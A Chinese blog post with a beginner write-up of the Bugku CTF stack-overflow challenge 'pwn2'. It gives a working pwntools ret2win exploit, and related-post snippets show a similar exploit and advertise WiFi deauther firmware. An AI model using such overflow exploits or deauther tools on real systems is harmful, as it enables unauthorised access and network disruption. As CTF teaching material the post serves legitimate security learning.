Bugku-pwn2新手题总结

最新推荐文章于 2023-01-15 11:50:09 发布
最新推荐文章于 2023-01-15 11:50:09 发布
阅读量211 收藏
点赞数
分类专栏: PWN学习笔记 文章标签: 信息安全 python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xindada559/article/details/117676541
版权

题目中给了附件,先下载附件,并启动场景

将附件重命名:“pwn2”,使用gdb pwn2 看下情况,或者是先用checksec pwn2 查看权限特点,再直接拖到IDA里也行

通过file pwn2  发现为 64位的程序,用IDA 64位打开 F5一下

通过查看read函数 和 get_shell,发现可能是栈溢出的基础题目,

我们发现只有read的第二个参数有可能溢出,就是return read里的buf

相差 0x30 + 0x08 = 0x38个单位

payload  = b'a'*0x38 + p64(0x400751) 

其中p64后面加的是get_shell的地址,也就是我们希望返回地址跳转的地址

from pwn import*                                                            
io = remote('114.67.246.176', 16292)
io.recvline()
payload = b'a'*0x38 + p64(0x400751)
io.sendline(payload)
io.interactive()

努力努力更努力NA
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习-bugku
qq_45653588的博客
12-20 777
文章目录 0x00 pwn1 第一很简单,nc连接后直接就有执行权限。 ls获取文件列表,cat flag就拿到了flag。 0x01 pwn2 第二下载文件,checksec查看文件保护和文件类型。 将文件拖入ida,发现了get_shell_函数 F5查看main函数代码,发现s申了0x30个字节,而read函数,最大能读取0X100个字符,就造成了栈溢出,我们只要将返回地址覆盖为get_shell_的地址就可以得到flag。 查看get_shell_函数,可以直接输出flag,只要将m
pwn之flag
jxz_dz的博客
11-07 1538
接前边继续开始第四个小项目flag,点开,要自己下载Download : http://pwnable.kr/bin/flag 1.用个16进制查看器看一下,是elf文件,并且加了upx壳,要脱下upx壳才好分析 2.利用upx 进行解压,upx -d filename 3.将解压后的flag文件放在ida中分析,按下F5: 4.分析可知,要把falg指向的...
PWN】02.基本介绍
weixin_52553215的博客
11-12 8658
一、原理 1.下载人提供的二进制程序,找到攻击目标(记录运行此程序的目标服务器) 2.逆向分析程序,漏洞挖掘 3.利用漏洞写脚本 4.攻击目标服务器获取flag二、基础 hook:Hook主要就是通过一定手段在程序执行过程中进行干预。 1.语言:C/C++ Python... 2.操作系统:Linux(基本的Linux命令) Win
Bugku pwn2
、moddemod
05-26 430
pwn2 目 chmod +x pwn2 这里都关闭了,栈上可执行! 这个程序里面直接留了后门get_shell_ 思路,输入的数据超过0x30栈空间大小,将get_shell_地址覆盖调用main函数的返回地址即可, 即b'm' * (0x30 + 8) + p64(0x400751),这里加上8是因为push了rbp,即8个字节大小 exp from pwn import * p = remote('114.116.54.89', '10003') payload = b'a' * (0x
bugku PWN repeater
alan___的博客
01-15 1020
bugku PWN repeater exp分享
ctf库ctf-pwn收集
03-31
ctf库 CTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn shellcode 变形shellcode练手目,该目主要是利用三个节点来注入shellcode,考验解人对shellcode的熟悉程度。解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
bugku pwnlibc
11-06
bugku pwnlibc,pwn3做时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原目中没有给出libc文件,也不容易获取libc版本
pwn栈溢出10道练习有writeup
01-04
pwn栈溢出练习目,每都有writeup.
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 286
[Bugku CTF——Pwn] pwn2 目地址:https://ctf.bugku.com/ 额,好久不写这么简单的目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4056
知识点 解流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该目为典型的格式字符串漏洞。 解思路 此的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2589
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
BugKu - pwn2
Casuall的博客
07-06 3665
这道来自于bugku旧平台的第二道pwn,还是比较简单的,一个典型的缓冲区溢出。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
ctf.bugku ctf目详解——pwn2
yeshen4328的专栏
05-26 1141
ctf.bugku ctf目详解——pwn2 目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
Bugku S3 AWD排位赛-2 pwn
z1r0的博客
08-13 585
可以通过s溢出改掉v5,满足条件即可。
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值